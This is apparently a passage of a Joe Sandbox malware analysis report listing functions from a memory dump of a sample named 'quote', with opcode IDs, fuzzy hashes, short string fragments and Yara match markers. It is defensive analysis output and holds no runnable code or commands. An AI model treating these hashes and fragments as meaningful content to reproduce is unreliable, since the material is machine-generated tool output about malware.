                                                                                      • Instruction Fuzzy Hash: 43228B71E4460ADEDB10CFA8C580EEDBFB9FF85315F10462ED166E6A80EB746681CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %9.I$3)o9$85oc$Jl)$Op!{
                                                                                      • API String ID: 0-3526803563
                                                                                      • Opcode ID: f815a23919858ab0f0dc1fa8f70bb2374c3ffee07138b180680d454ae18c7afa
                                                                                      • Instruction ID: 547dac7610436112008a0c05cbc581f9ff11dcb5992d7a64a2648cdfab87347f
                                                                                      • Opcode Fuzzy Hash: f815a23919858ab0f0dc1fa8f70bb2374c3ffee07138b180680d454ae18c7afa
                                                                                      • Instruction Fuzzy Hash: ECB14572608359DFCF39CE28C9947EA37A2EF96354F94816ACC498F601D3324A46CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: %"x-$MgB)$T[PX$j3yF
                                                                                      • API String ID: 0-625941962
                                                                                      • Opcode ID: 25905fbf01d16f9f34195505b236583296716091274c29f9f84147f4288b77c8
                                                                                      • Instruction ID: 1b5d378325faa7126246930758535b8f387bf2a10094fd54f9fcc18feb3a3c36
                                                                                      • Opcode Fuzzy Hash: 25905fbf01d16f9f34195505b236583296716091274c29f9f84147f4288b77c8
                                                                                      • Instruction Fuzzy Hash: 0102CD7217CA690FEB1CDF7898CE57E7786F7C5625360C66ED083C7487EA2158874160
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: P6^;$c`HG${)F$
                                                                                      • API String ID: 0-1021617468
                                                                                      • Opcode ID: f3f05e6049c3b9fbc7bd5d5a9a21b6c7af0db5701bab171a27243e5e18a2148d
                                                                                      • Instruction ID: 469187b17d2de1fcd507f1293ea5637608775b90e391c0630c49c665a22b9afc
                                                                                      • Opcode Fuzzy Hash: f3f05e6049c3b9fbc7bd5d5a9a21b6c7af0db5701bab171a27243e5e18a2148d
                                                                                      • Instruction Fuzzy Hash: 13D1F06213CE6C2FF20CDB399CDE9BB578AF7C62257A5866ED083C308BE53184474255
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3)o9$85oc$Op!{
                                                                                      • API String ID: 0-1046812284
                                                                                      • Opcode ID: fc4fbce3133212ee6dccc9f321a498c33077202ea205ee856562888d56962b2e
                                                                                      • Instruction ID: ddbcf258154b1b4896b4483adb39c5972682a4562e4e54a837af4d84ff31d613
                                                                                      • Opcode Fuzzy Hash: fc4fbce3133212ee6dccc9f321a498c33077202ea205ee856562888d56962b2e
                                                                                      • Instruction Fuzzy Hash: 14A188B1A0831ADFDB358E34CD853DA37A2EF96350FA482BACD598F251D7314942CB41
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3)o9$85oc$Op!{
                                                                                      • API String ID: 0-1046812284
                                                                                      • Opcode ID: c847fd7de80775ec90aad952326b5e6777cf29a8ad9d3fe716274b0b7c7300ae
                                                                                      • Instruction ID: cf822f32de1ad25f9bcd5a8772f15bdf10f8f3f8ba7175f24a7e9a2ace6f79f9
                                                                                      • Opcode Fuzzy Hash: c847fd7de80775ec90aad952326b5e6777cf29a8ad9d3fe716274b0b7c7300ae
                                                                                      • Instruction Fuzzy Hash: E9914472A08319DFDB349E24CA847EE3772EF86364F54826ECC198B645E3351A4BCB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 3)o9$85oc$Op!{
                                                                                      • API String ID: 0-1046812284
                                                                                      • Opcode ID: d988b78a5ea6e7f2f9189657927ce976e43b4f0dcdcdbc3de57d4ea9ef2069fc
                                                                                      • Instruction ID: d1b737926a26949c2e338b4614bebb65be58ea2d2ba964046ccfca1582e9e879
                                                                                      • Opcode Fuzzy Hash: d988b78a5ea6e7f2f9189657927ce976e43b4f0dcdcdbc3de57d4ea9ef2069fc
                                                                                      • Instruction Fuzzy Hash: 98614572A08319CFDB259E38CA847DA3772FF46750F94826DCC198B585E33A194BCB15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm$|jjj
                                                                                      • API String ID: 0-2435813841
                                                                                      • Opcode ID: 2e14e99f2f4e07314c71bcce4d382ff77fb04a43516b91ec960e09c4663b7ddd
                                                                                      • Instruction ID: 62c2d06775cdbbeaaadcffd0bb85fd0a5d07561b9a94eb9caf28e8873bd0b8c5
                                                                                      • Opcode Fuzzy Hash: 2e14e99f2f4e07314c71bcce4d382ff77fb04a43516b91ec960e09c4663b7ddd
                                                                                      • Instruction Fuzzy Hash: 7BF1AD53E3F71598E7933072C1117E25AC1DF2748AE25CB26D82AB25A17B1F4A4F84C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C$tGjm
                                                                                      • API String ID: 0-836133603
                                                                                      • Opcode ID: 14ac063372bf8cfe9a517c9d457c2841e99da67b58e38b126644796682fcce61
                                                                                      • Instruction ID: b89ccd510f43e85b2593cca28413d13c8b317c6793cf0163210452d20e9bd391
                                                                                      • Opcode Fuzzy Hash: 14ac063372bf8cfe9a517c9d457c2841e99da67b58e38b126644796682fcce61
                                                                                      • Instruction Fuzzy Hash: B8811E62E2F71598DB93317281513F166D0CF1318AE59C72BCC2BB24A1BB6F4A4FC585
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C$?$X^G+
                                                                                      • API String ID: 0-4141147957
                                                                                      • Opcode ID: 20f7ffbf25cd5a1aba462ff4ad7cb248fe357fe575f462125293302089b07a85
                                                                                      • Instruction ID: a78aba374b4f13272a9a68790cbe77f7eee057a8e669834e5cfe3894a5ad0120
                                                                                      • Opcode Fuzzy Hash: 20f7ffbf25cd5a1aba462ff4ad7cb248fe357fe575f462125293302089b07a85
                                                                                      • Instruction Fuzzy Hash: 4C81357170434A9FDB388E28C9A47EA37A2FF95390F59812DCC8A8B645D7349A45CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C$?$X^G+
                                                                                      • API String ID: 0-4141147957
                                                                                      • Opcode ID: c09f8b3db3e0ef53862e6b561a1d6b4f2d07fe4ed24c9bbde0f14a24b0c233a6
                                                                                      • Instruction ID: 758a89e897847c70b266214657e20e25b7707ea91f7727a6e8722c5cc6877985
                                                                                      • Opcode Fuzzy Hash: c09f8b3db3e0ef53862e6b561a1d6b4f2d07fe4ed24c9bbde0f14a24b0c233a6
                                                                                      • Instruction Fuzzy Hash: 7E8167716043498BDB349E28CEE47EE33A6FF95390F58812DCC9A8B249E7385646CB15
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C$?$X^G+
                                                                                      • API String ID: 0-4141147957
                                                                                      • Opcode ID: 7fe32ca519690b18fb9ed4bb45cdd61e1ff301da1d1e506242687adf81f51862
                                                                                      • Instruction ID: 9f5fb26dff84b881284c4d6d5394be6be925eb8fd4e702ddbf37345b64890c34
                                                                                      • Opcode Fuzzy Hash: 7fe32ca519690b18fb9ed4bb45cdd61e1ff301da1d1e506242687adf81f51862
                                                                                      • Instruction Fuzzy Hash: B8714971A043099BDB249E28CED47DE33B7EF953A0F58412DCC998B645E338664ACB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: C$?$X^G+
                                                                                      • API String ID: 0-4141147957
                                                                                      • Opcode ID: e13f47566b6ad5938ac99beef1e998d4d2e3844d2b89303cdb990f70a3578411
                                                                                      • Instruction ID: 5d0519a34bb9db6e98390d22c2c0f724530f49a594b3b44efcd05a781c9d1299
                                                                                      • Opcode Fuzzy Hash: e13f47566b6ad5938ac99beef1e998d4d2e3844d2b89303cdb990f70a3578411
                                                                                      • Instruction Fuzzy Hash: 7861897160434A8FDB349E38CEE43EE37A2EF953A0F19412DCC998B649D3385646CB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: o6F$$tLD
                                                                                      • API String ID: 0-3118301973
                                                                                      • Opcode ID: 7ac5d6e83c507afa846f17aa7bd296b0bfa3f6d9615506e28910328d14ede67e
                                                                                      • Instruction ID: 50c1a023100c56886ec8a2d735404717a6e9d0ca8581afd6089a8a444a8eee44
                                                                                      • Opcode Fuzzy Hash: 7ac5d6e83c507afa846f17aa7bd296b0bfa3f6d9615506e28910328d14ede67e
                                                                                      • Instruction Fuzzy Hash: 2C514834600306CFDF3CAE3496A87FA33A3BF94254F94825AD85A87294E735C597CB02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4!6$]o
                                                                                      • API String ID: 0-2817387296
                                                                                      • Opcode ID: ad6b984f9c743a9745e42125db4009e77861f6a37bed64fb0caa1a9b7b6d8e54
                                                                                      • Instruction ID: 38786120ad4fdfe84f4d4b6734051d2383b5abf2ecd1943475df40d20f816f63
                                                                                      • Opcode Fuzzy Hash: ad6b984f9c743a9745e42125db4009e77861f6a37bed64fb0caa1a9b7b6d8e54
                                                                                      • Instruction Fuzzy Hash: DC514E316043464BEF285E788DB53EB37A3AF66790F89026DCDC68B185D7348946C706
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$`-
                                                                                      • API String ID: 0-1396957022
                                                                                      • Opcode ID: a0e30f0cedcc7bda879ea33ac3c566c2091f561e207621097cefd65a651eeae3
                                                                                      • Instruction ID: fa29eae87430cfacf1e0aaea0edb8b33a87c76726c3ca41db3786a99093cceb2
                                                                                      • Opcode Fuzzy Hash: a0e30f0cedcc7bda879ea33ac3c566c2091f561e207621097cefd65a651eeae3
                                                                                      • Instruction Fuzzy Hash: 4A4123716013888FDF78DE398DA53DE3BA2AF82344F65815ACC8E8B151EB3146498F02
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 12624ddafcfe8c7159fac25982001cb33ee12dbd7ed7e73682c21a861112a400
                                                                                      • Instruction ID: 0ae42eec00b9db4038d746bde7d54dc2f3c6421b2ff8ca6a0e59b0aa437bdf9b
                                                                                      • Opcode Fuzzy Hash: 12624ddafcfe8c7159fac25982001cb33ee12dbd7ed7e73682c21a861112a400
                                                                                      • Instruction Fuzzy Hash: 2A02AD43E3F71599E7933072C1417E25AC1DF2758AE25CB26DC2AB25A17B2F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: dee9fdf78507b5ffbec0943f38029a75da94a3141582796b6b8aba0f495508bb
                                                                                      • Instruction ID: 0132a48fa31f149ddb7a5e9c3435edb7dd047af257f483a4893614793b23413b
                                                                                      • Opcode Fuzzy Hash: dee9fdf78507b5ffbec0943f38029a75da94a3141582796b6b8aba0f495508bb
                                                                                      • Instruction Fuzzy Hash: E502AC43E3F71599E7933072C1117E15AC0DF2758AE26CB26DC2AB25A17B2F4A8F84C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 4dd8b3334e146d2c8ee12995cda9db6fe5ddf2acf914e6b64557d9c0ef71cf09
                                                                                      • Instruction ID: 1683a15c3c817ac1283d63c4fdfefc6447465abad42af863a7147be5ea9fbc10
                                                                                      • Opcode Fuzzy Hash: 4dd8b3334e146d2c8ee12995cda9db6fe5ddf2acf914e6b64557d9c0ef71cf09
                                                                                      • Instruction Fuzzy Hash: 8102AC43E3F71599E7933072C1417E15AC0DF2758AE26CB26DC2AB25A17B2F4A8F84D4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 3078ee91f385ed62cb445861fcea116f44eda582e5e4ccb1428e409c37997323
                                                                                      • Instruction ID: f742642b9c30fbdd3c6a8003497967588fcbc9a9da354ae14b3fd183a75e03b5
                                                                                      • Opcode Fuzzy Hash: 3078ee91f385ed62cb445861fcea116f44eda582e5e4ccb1428e409c37997323
                                                                                      • Instruction Fuzzy Hash: 8C02BD43E3F71599E7933072C1117E25AC1DF2758AE25CB26DC2AB25A17B2F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 8c6a83d21b2f8f38407f400d0d4ac9706c3463447323b917ad9572240cbc0689
                                                                                      • Instruction ID: c5ae21c4228ed2b248de86e15a054da325488bbe3f4ddeed172a8b726cfce695
                                                                                      • Opcode Fuzzy Hash: 8c6a83d21b2f8f38407f400d0d4ac9706c3463447323b917ad9572240cbc0689
                                                                                      • Instruction Fuzzy Hash: F4F1AD53E3F71598E7933072C1517E15AD0DF2748AE26CB26DC2AB25A17B1F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 2661f3410bf2e20effcb874c566133392d1c24ff50dfcdb7dc0562ce4a75de28
                                                                                      • Instruction ID: f8d8c326675b60d72c32104d033a186b4878b9cf696ef637ce374a6126b36bed
                                                                                      • Opcode Fuzzy Hash: 2661f3410bf2e20effcb874c566133392d1c24ff50dfcdb7dc0562ce4a75de28
                                                                                      • Instruction Fuzzy Hash: 8302AE53E3F71599E7933072C1417E15AC1DF2748AE25CB27D82AB25A17B2F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 96cf810f6c4697e6eae237fd39bb6ade4796859f2010c48189c8b3f456cce1ee
                                                                                      • Instruction ID: 5ddace649b8cff5154b81b836eb71b8a9eaa6c2943e49f1fabcb01ed4c47a1f4
                                                                                      • Opcode Fuzzy Hash: 96cf810f6c4697e6eae237fd39bb6ade4796859f2010c48189c8b3f456cce1ee
                                                                                      • Instruction Fuzzy Hash: F5F1BE53E3F71598E7933072C1117E25AD0DF2748AE26CB26DC2AB25A17B5F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 47b89e6c325bc331a53c885f9db6c812a8b910b2822b242d0663ab8b661d9deb
                                                                                      • Instruction ID: ab4c08933b2d7654ecbdbf0d97daeccd494852b31f6c7a317bf1c7dc13924cc9
                                                                                      • Opcode Fuzzy Hash: 47b89e6c325bc331a53c885f9db6c812a8b910b2822b242d0663ab8b661d9deb
                                                                                      • Instruction Fuzzy Hash: C602AD53E3F71598E7933072C1117E25AC1DF2748AE26CB27D82AB25A17B1F4A8F84C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 3b5ca4527b3a2110d630e32f0aff7df6f44bc840a8403cf19be854ec8c1aa520
                                                                                      • Instruction ID: 74a6355642ac8b6c27dbe6762912c446cc05c245f5152fc0751b5efeda1bb8db
                                                                                      • Opcode Fuzzy Hash: 3b5ca4527b3a2110d630e32f0aff7df6f44bc840a8403cf19be854ec8c1aa520
                                                                                      • Instruction Fuzzy Hash: 32F1BE53E3F71598E7933072C1517E15AD0DF2748AE26CB26DC2AB25A17B1F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 54cbec7b6ab30448e6ac416b9e0f0ef29fe00513e755cdfa20598db13e0a2c4f
                                                                                      • Instruction ID: de64d3144cfd8db7677ae52422d7badb4a68fd8955c570ee8dab9689fdd04fd6
                                                                                      • Opcode Fuzzy Hash: 54cbec7b6ab30448e6ac416b9e0f0ef29fe00513e755cdfa20598db13e0a2c4f
                                                                                      • Instruction Fuzzy Hash: 6BF1AC53E3F71598E7933072C1517E15AC0DF2748AE26CB26DC2AB25A17B1F4A8F84C4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MemoryProtectVirtual
                                                                                      • String ID: )"JP
                                                                                      • API String ID: 2706961497-2789890909
                                                                                      • Opcode ID: ba239be06eefb6846d50494b64f096c89387539fb0f9e3a57c1a0433d08c436c
                                                                                      • Instruction ID: 73dcca69646d0bfe94892016f3410ac69e101ba7a88391168878da2c36dc9ce0
                                                                                      • Opcode Fuzzy Hash: ba239be06eefb6846d50494b64f096c89387539fb0f9e3a57c1a0433d08c436c
                                                                                      • Instruction Fuzzy Hash: 144205315083858EDF35DF38C89C7DA7BA2AF52360F49829ACCD98F296D7358646C712
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 6bcdf2d53ff02c2f97cd543fc8460c8bed2ba56e5ae728cb74ec57c2855ffc79
                                                                                      • Instruction ID: c36061b03c3b4524ee9cd95f11792c8f7a0ca630637ed01868c228f34fdc7d71
                                                                                      • Opcode Fuzzy Hash: 6bcdf2d53ff02c2f97cd543fc8460c8bed2ba56e5ae728cb74ec57c2855ffc79
                                                                                      • Instruction Fuzzy Hash: 9AF1BD53E3F71598E7933072C1517E15AC0DF2748AE26CB2ADC2AB25A17B1F4A4F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 26883118eb0a5f7de5a494216e4121d96e1eb30dbdc94c01a1121452e2898829
                                                                                      • Instruction ID: a2fb533734562cf6701366c9e66f4e47bd1ba615b3f5633657c58f9128b6c3cf
                                                                                      • Opcode Fuzzy Hash: 26883118eb0a5f7de5a494216e4121d96e1eb30dbdc94c01a1121452e2898829
                                                                                      • Instruction Fuzzy Hash: 5BE1AC53E3F71598E7933072C1117E15AD0DF2748AE26CB26DC2AB25A17B1F4A8F84C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1327394127.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2c80000_quote.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: tGjm
                                                                                      • API String ID: 0-484306266
                                                                                      • Opcode ID: 30c9bb9be2c2ea9259653205a307de0c8aa608b77172a4f5c30ba3e6c8f2c5c1
                                                                                      • Instruction ID: 704b3db0116433d76dcf00031598cfc228ad9365d4def36e2493377c7fe8c868
                                                                                      • Opcode Fuzzy Hash: 30c9bb9be2c2ea9259653205a307de0c8aa608b77172a4f5c30ba3e6c8f2c5c1
                                                                                      • Instruction Fuzzy Hash: DCF1BC53E3F71598E7933072C1117E15AC0DF2748AE26CB26DC2AB25A17B1F4A8F84C8
                                                                                      Uniqueness

